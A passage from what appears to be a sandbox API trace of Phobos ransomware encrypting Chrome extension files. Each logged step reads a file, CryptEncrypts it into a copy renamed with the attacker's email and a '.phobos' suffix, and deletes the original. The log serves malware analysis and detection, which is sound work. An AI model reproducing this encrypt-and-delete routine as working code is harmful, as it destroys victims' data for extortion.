data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lv\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0154.837] GetFileSizeEx (in: hFile=0x194, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=198) returned 1 [0154.838] CloseHandle (hObject=0x194) returned 1 [0154.838] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lv\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lv\\messages.json")) returned 0x2020 [0154.838] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lv\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lv\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0154.838] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lv\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lv\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0154.838] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0154.838] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0154.838] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lv\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lv\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0154.838] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa327e8) returned 1 [0154.839] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0154.839] ReadFile (in: hFile=0x194, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0xc6, lpOverlapped=0x0) returned 1 [0154.839] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xd0, dwBufLen=0xd0 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xd0) returned 1 [0154.839] WriteFile (in: hFile=0x138, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xd0, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xd0, lpOverlapped=0x0) returned 1 [0154.840] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32e28) returned 1 [0154.840] CryptSetKeyParam (hKey=0xa32e28, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0154.840] CryptEncrypt (in: hKey=0xa32e28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0154.840] CryptDestroyKey (hKey=0xa32e28) returned 1 [0154.840] WriteFile (in: hFile=0x138, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0154.841] CryptDestroyKey (hKey=0xa327e8) returned 1 [0154.841] CloseHandle (hObject=0x194) returned 1 [0154.841] CloseHandle (hObject=0x138) returned 1 [0154.841] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lv\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lv\\messages.json")) returned 1 [0154.842] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0154.842] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ml\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ml\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0154.842] GetFileSizeEx (in: hFile=0x138, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=387) returned 1 [0154.842] CloseHandle (hObject=0x138) returned 1 [0154.842] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ml\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ml\\messages.json")) returned 0x2020 [0154.842] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ml\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ml\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0154.842] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ml\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ml\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0154.842] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0154.842] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0154.842] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ml\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ml\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0154.843] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa327e8) returned 1 [0154.843] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0154.843] ReadFile (in: hFile=0x138, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x183, lpOverlapped=0x0) returned 1 [0155.099] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x190, dwBufLen=0x190 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x190) returned 1 [0155.099] WriteFile (in: hFile=0x194, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x190, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x190, lpOverlapped=0x0) returned 1 [0155.100] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32d28) returned 1 [0155.100] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0155.100] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0155.100] CryptDestroyKey (hKey=0xa32d28) returned 1 [0155.100] WriteFile (in: hFile=0x194, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0155.101] CryptDestroyKey (hKey=0xa327e8) returned 1 [0155.101] CloseHandle (hObject=0x138) returned 1 [0155.101] CloseHandle (hObject=0x194) returned 1 [0155.101] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ml\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ml\\messages.json")) returned 1 [0155.102] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0155.102] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_metadata\\verified_contents.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_metadata\\verified_contents.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0155.103] GetFileSizeEx (in: hFile=0x194, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=17492) returned 1 [0155.103] CloseHandle (hObject=0x194) returned 1 [0155.103] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_metadata\\verified_contents.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_metadata\\verified_contents.json")) returned 0x2020 [0155.103] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_metadata\\verified_contents.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_metadata\\verified_contents.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0155.103] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_metadata\\verified_contents.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_metadata\\verified_contents.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0155.103] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0155.103] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0155.103] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_metadata\\verified_contents.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_metadata\\verified_contents.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0155.104] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa327e8) returned 1 [0155.104] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0155.104] ReadFile (in: hFile=0x194, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x4454, lpOverlapped=0x0) returned 1 [0155.111] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x4460, dwBufLen=0x4460 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x4460) returned 1 [0155.111] WriteFile (in: hFile=0x138, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x4460, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x4460, lpOverlapped=0x0) returned 1 [0155.113] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32d28) returned 1 [0155.113] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0155.113] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x50, dwBufLen=0x50 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x50) returned 1 [0155.113] CryptDestroyKey (hKey=0xa32d28) returned 1 [0155.113] WriteFile (in: hFile=0x138, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x102, lpOverlapped=0x0) returned 1 [0155.113] CryptDestroyKey (hKey=0xa327e8) returned 1 [0155.113] CloseHandle (hObject=0x194) returned 1 [0155.113] CloseHandle (hObject=0x138) returned 1 [0155.113] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_metadata\\verified_contents.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_metadata\\verified_contents.json")) returned 1 [0155.114] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0155.114] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\craw_window.js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\craw_window.js"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0155.115] GetFileSizeEx (in: hFile=0x138, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=241753) returned 1 [0155.115] CloseHandle (hObject=0x138) returned 1 [0155.115] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\craw_window.js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\craw_window.js")) returned 0x2020 [0155.115] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\craw_window.js.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\craw_window.js.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0155.115] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\craw_window.js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\craw_window.js"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0155.115] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0155.115] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0155.115] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\craw_window.js.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\craw_window.js.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0155.116] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa327e8) returned 1 [0155.116] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0155.116] ReadFile (in: hFile=0x138, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x3b059, lpOverlapped=0x0) returned 1 [0155.264] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x3b060, dwBufLen=0x3b060 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x3b060) returned 1 [0155.274] WriteFile (in: hFile=0x194, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x3b060, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x3b060, lpOverlapped=0x0) returned 1 [0155.286] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32da8) returned 1 [0155.286] CryptSetKeyParam (hKey=0xa32da8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0155.286] CryptEncrypt (in: hKey=0xa32da8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0155.286] CryptDestroyKey (hKey=0xa32da8) returned 1 [0155.286] WriteFile (in: hFile=0x194, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0155.287] CryptDestroyKey (hKey=0xa327e8) returned 1 [0155.287] CloseHandle (hObject=0x138) returned 1 [0155.287] CloseHandle (hObject=0x194) returned 1 [0155.288] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\craw_window.js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\craw_window.js")) returned 1 [0155.299] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0155.299] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\html\\craw_window.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\html\\craw_window.html"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0155.300] GetFileSizeEx (in: hFile=0x194, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=810) returned 1 [0155.300] CloseHandle (hObject=0x194) returned 1 [0155.300] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\html\\craw_window.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\html\\craw_window.html")) returned 0x2020 [0155.300] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\html\\craw_window.html.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\html\\craw_window.html.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0155.300] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\html\\craw_window.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\html\\craw_window.html"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0155.300] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, 